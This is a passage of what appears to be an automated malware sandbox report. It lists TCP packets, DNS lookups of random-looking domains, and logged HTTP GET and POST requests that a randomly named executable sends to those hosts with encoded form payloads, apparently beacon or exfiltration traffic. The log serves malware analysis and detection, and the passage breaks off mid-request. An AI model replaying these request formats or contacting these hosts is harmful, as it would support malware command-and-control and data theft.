                                                        Jan 16, 2025 00:44:24.472098112 CET8050001199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:25.062517881 CET8050001199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:25.062587023 CET8050001199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:25.062644005 CET5000180192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:25.968039989 CET5000180192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:26.986783028 CET5000280192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:26.993585110 CET8050002199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:26.993691921 CET5000280192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:27.008552074 CET5000280192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:27.015094042 CET8050002199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:27.016721010 CET8050002199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:27.997697115 CET8050002199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:27.997879028 CET8050002199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:27.997961998 CET5000280192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:28.515103102 CET5000280192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:29.533893108 CET5000380192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:29.541511059 CET8050003199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:29.541635990 CET5000380192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:29.551443100 CET5000380192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:29.557971001 CET8050003199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:30.170164108 CET8050003199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:30.170212984 CET8050003199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:30.170396090 CET5000380192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:30.173234940 CET5000380192.168.2.6199.192.21.169
                                                        Jan 16, 2025 00:44:30.179579973 CET8050003199.192.21.169192.168.2.6
                                                        Jan 16, 2025 00:44:35.709736109 CET5000480192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:35.717197895 CET8050004154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:35.719331980 CET5000480192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:35.734298944 CET5000480192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:35.741656065 CET8050004154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:36.363445997 CET8050004154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:36.363543034 CET8050004154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:36.363588095 CET5000480192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:37.249896049 CET5000480192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:38.268801928 CET5000580192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:38.275660992 CET8050005154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:38.275835991 CET5000580192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:38.296251059 CET5000580192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:38.302858114 CET8050005154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:38.873895884 CET8050005154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:38.873924971 CET8050005154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:38.874130964 CET5000580192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:39.811920881 CET5000580192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:40.830593109 CET5000680192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:40.838371992 CET8050006154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:40.838541985 CET5000680192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:40.854321003 CET5000680192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:40.861471891 CET8050006154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:40.862035036 CET8050006154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:41.418874979 CET8050006154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:41.419028044 CET8050006154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:41.419101954 CET5000680192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:42.358751059 CET5000680192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:43.377964020 CET5000780192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:43.384972095 CET8050007154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:43.385088921 CET5000780192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:43.394776106 CET5000780192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:43.401534081 CET8050007154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:43.964854002 CET8050007154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:43.965007067 CET8050007154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:43.965194941 CET5000780192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:43.967945099 CET5000780192.168.2.6154.197.162.239
                                                        Jan 16, 2025 00:44:43.974168062 CET8050007154.197.162.239192.168.2.6
                                                        Jan 16, 2025 00:44:58.046206951 CET5000980192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:44:58.052797079 CET8050009134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:44:58.052902937 CET5000980192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:44:58.065519094 CET5000980192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:44:58.071737051 CET8050009134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:44:58.924982071 CET8050009134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:44:58.925250053 CET8050009134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:44:58.925327063 CET5000980192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:44:59.577661037 CET5000980192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:00.597069025 CET5001080192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:00.603782892 CET8050010134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:00.603941917 CET5001080192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:00.629848003 CET5001080192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:00.636804104 CET8050010134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:01.501584053 CET8050010134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:01.501745939 CET8050010134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:01.501813889 CET5001080192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:02.141756058 CET5001080192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:03.260847092 CET5001180192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:03.265738964 CET8050011134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:03.265820980 CET5001180192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:03.298104048 CET5001180192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:03.302915096 CET8050011134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:03.302999020 CET8050011134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:04.195646048 CET8050011134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:04.195833921 CET8050011134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:04.195895910 CET5001180192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:04.812150002 CET5001180192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:05.830921888 CET5001280192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:05.838131905 CET8050012134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:05.838319063 CET5001280192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:05.852617025 CET5001280192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:05.858660936 CET8050012134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:06.742624044 CET8050012134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:06.742638111 CET8050012134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:06.742789984 CET5001280192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:06.745765924 CET5001280192.168.2.6134.122.133.80
                                                        Jan 16, 2025 00:45:06.752062082 CET8050012134.122.133.80192.168.2.6
                                                        Jan 16, 2025 00:45:11.774139881 CET5001380192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:11.781083107 CET805001347.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:11.781171083 CET5001380192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:11.795666933 CET5001380192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:11.802238941 CET805001347.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:13.312098980 CET5001380192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:13.318358898 CET805001347.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:13.318473101 CET5001380192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:14.348522902 CET5001480192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:14.353463888 CET805001447.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:14.353550911 CET5001480192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:14.395318031 CET5001480192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:14.402477026 CET805001447.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:15.905888081 CET5001480192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:15.913254023 CET805001447.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:15.915683985 CET5001480192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:16.971015930 CET5001580192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:16.977965117 CET805001547.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:16.978097916 CET5001580192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:17.050340891 CET5001580192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:17.057311058 CET805001547.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:17.059576988 CET805001547.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:18.435184956 CET805001547.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:18.435401917 CET805001547.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:18.435484886 CET5001580192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:18.562108994 CET5001580192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:19.580782890 CET5001680192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:19.588579893 CET805001647.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:19.588805914 CET5001680192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:19.598169088 CET5001680192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:19.606956959 CET805001647.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:21.205452919 CET805001647.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:21.205511093 CET805001647.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:21.205943108 CET5001680192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:21.213470936 CET5001680192.168.2.647.83.1.90
                                                        Jan 16, 2025 00:45:21.221709967 CET805001647.83.1.90192.168.2.6
                                                        Jan 16, 2025 00:45:26.394915104 CET5001880192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:26.399789095 CET8050018188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:26.399888039 CET5001880192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:26.418716908 CET5001880192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:26.423691034 CET8050018188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:27.005389929 CET8050018188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:27.005412102 CET8050018188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:27.005522013 CET5001880192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:27.006118059 CET8050018188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:27.006182909 CET5001880192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:27.921586990 CET5001880192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:29.344141960 CET5001980192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:29.351170063 CET8050019188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:29.351252079 CET5001980192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:29.415868998 CET5001980192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:29.423309088 CET8050019188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:29.941860914 CET8050019188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:29.941879988 CET8050019188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:29.941890001 CET8050019188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:29.942065954 CET5001980192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:29.942629099 CET8050019188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:29.942711115 CET5001980192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:30.921880007 CET5001980192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:31.972110033 CET5002080192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:31.977020025 CET8050020188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:31.977092981 CET5002080192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:31.995879889 CET5002080192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:32.000847101 CET8050020188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:32.001081944 CET8050020188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:32.595988035 CET8050020188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:32.596007109 CET8050020188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:32.596148014 CET5002080192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:32.597244024 CET8050020188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:32.597337961 CET5002080192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:33.499959946 CET5002080192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.024095058 CET5002180192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.028992891 CET8050021188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:35.029063940 CET5002180192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.069148064 CET5002180192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.075716019 CET8050021188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:35.715250015 CET8050021188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:35.715286016 CET8050021188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:35.715538979 CET8050021188.114.97.3192.168.2.6
                                                        Jan 16, 2025 00:45:35.715620995 CET5002180192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.715687037 CET5002180192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.719652891 CET5002180192.168.2.6188.114.97.3
                                                        Jan 16, 2025 00:45:35.724462986 CET8050021188.114.97.3192.168.2.6

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 16, 2025 00:43:24.950674057 CET5767553192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:43:24.967778921 CET53576751.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:43:41.487010002 CET5195053192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:43:41.536391020 CET53519501.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:43:54.690148115 CET5133353192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:43:54.712809086 CET53513331.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:44:08.111835003 CET5666153192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:44:08.257024050 CET53566611.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:44:21.861809969 CET5412153192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:44:21.884505987 CET53541211.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:44:35.190548897 CET6353553192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:44:35.707199097 CET53635351.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:44:48.971434116 CET5666253192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:44:48.991184950 CET53566621.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:44:57.113953114 CET5432353192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:44:58.043904066 CET53543231.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:45:11.753173113 CET5656053192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:45:11.771658897 CET53565601.1.1.1192.168.2.6
                                                        Jan 16, 2025 00:45:26.229804039 CET6472753192.168.2.61.1.1.1
                                                        Jan 16, 2025 00:45:26.391622066 CET53647271.1.1.1192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 16, 2025 00:43:24.950674057 CET192.168.2.61.1.1.10xfbdcStandard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:43:41.487010002 CET192.168.2.61.1.1.10xc1f9Standard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:43:54.690148115 CET192.168.2.61.1.1.10xfe46Standard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:08.111835003 CET192.168.2.61.1.1.10xba95Standard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:21.861809969 CET192.168.2.61.1.1.10x4f4dStandard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:35.190548897 CET192.168.2.61.1.1.10x1c9fStandard query (0)www.investshares.netA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:48.971434116 CET192.168.2.61.1.1.10xc2dbStandard query (0)www.nosolofichas.onlineA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:57.113953114 CET192.168.2.61.1.1.10xfe1dStandard query (0)www.jrcov55qgcxp5fwa.topA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:45:11.753173113 CET192.168.2.61.1.1.10x4c8dStandard query (0)www.adadev.infoA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:45:26.229804039 CET192.168.2.61.1.1.10x88faStandard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 16, 2025 00:43:24.967778921 CET1.1.1.1192.168.2.60xfbdcNo error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:43:41.536391020 CET1.1.1.1192.168.2.60xc1f9No error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                                        Jan 16, 2025 00:43:41.536391020 CET1.1.1.1192.168.2.60xc1f9No error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:43:54.712809086 CET1.1.1.1192.168.2.60xfe46No error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:43:54.712809086 CET1.1.1.1192.168.2.60xfe46No error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:08.257024050 CET1.1.1.1192.168.2.60xba95No error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                        Jan 16, 2025 00:44:08.257024050 CET1.1.1.1192.168.2.60xba95No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:08.257024050 CET1.1.1.1192.168.2.60xba95No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:21.884505987 CET1.1.1.1192.168.2.60x4f4dNo error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:35.707199097 CET1.1.1.1192.168.2.60x1c9fNo error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:48.991184950 CET1.1.1.1192.168.2.60xc2dbName error (3)www.nosolofichas.onlinenonenoneA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:58.043904066 CET1.1.1.1192.168.2.60xfe1dNo error (0)www.jrcov55qgcxp5fwa.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                        Jan 16, 2025 00:44:58.043904066 CET1.1.1.1192.168.2.60xfe1dNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:44:58.043904066 CET1.1.1.1192.168.2.60xfe1dNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:45:11.771658897 CET1.1.1.1192.168.2.60x4c8dNo error (0)www.adadev.info47.83.1.90A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:45:26.391622066 CET1.1.1.1192.168.2.60x88faNo error (0)www.cifasnc.info188.114.97.3A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 00:45:26.391622066 CET1.1.1.1192.168.2.60x88faNo error (0)www.cifasnc.info188.114.96.3A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.gayhxi.info
                                                        • www.promocao.info
                                                        • www.grimbo.boats
                                                        • www.44756.pizza
                                                        • www.lonfor.website
                                                        • www.investshares.net
                                                        • www.jrcov55qgcxp5fwa.top
                                                        • www.adadev.info
                                                        • www.cifasnc.info

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.64994247.83.1.90804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:24.992451906 CET483OUTGET /k2i2/?XLc=1bXtqxM&fVnx=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.gayhxi.info
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:43:26.409812927 CET139INHTTP/1.1 567 unknown
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 15 Jan 2025 23:43:26 GMT
                                                        Content-Length: 17
                                                        Connection: close
                                                        Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                        Data Ascii: Request too large


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.64998484.32.84.32804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:41.557832003 CET744OUTPOST /zaz4/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.promocao.info
                                                        Origin: http://www.promocao.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.promocao.info/zaz4/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 64 66 4e 36 53 79 53 4c 66 43 35 54 61 31 39 71 51 64 58 7a 53 5a 56 52 4d 34 47 64 54 49 4e 72 54 49 2b 4f 52 48 6f 38 74 68 50
                                                        Data Ascii: fVnx=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvdfN6SySLfC5Ta19qQdXzSZVRM4GdTINrTI+ORHo8thP


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.64998584.32.84.32804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:44.134154081 CET768OUTPOST /zaz4/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.promocao.info
                                                        Origin: http://www.promocao.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.promocao.info/zaz4/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 35 58 52 4f 67 30 64 7a 49 6e 70 54 77 2b 63 47 4c 50 7a 5a 45 73 45 54 47 30 34 4b 67 45 4e 65 61 44 64 44 79 4b 2b 35 5a 31 4e 77 3d 3d
                                                        Data Ascii: fVnx=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC5XROg0dzInpTw+cGLPzZEsETG04KgENeaDdDyK+5Z1Nw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.64998684.32.84.32804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:46.681536913 CET1781OUTPOST /zaz4/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.promocao.info
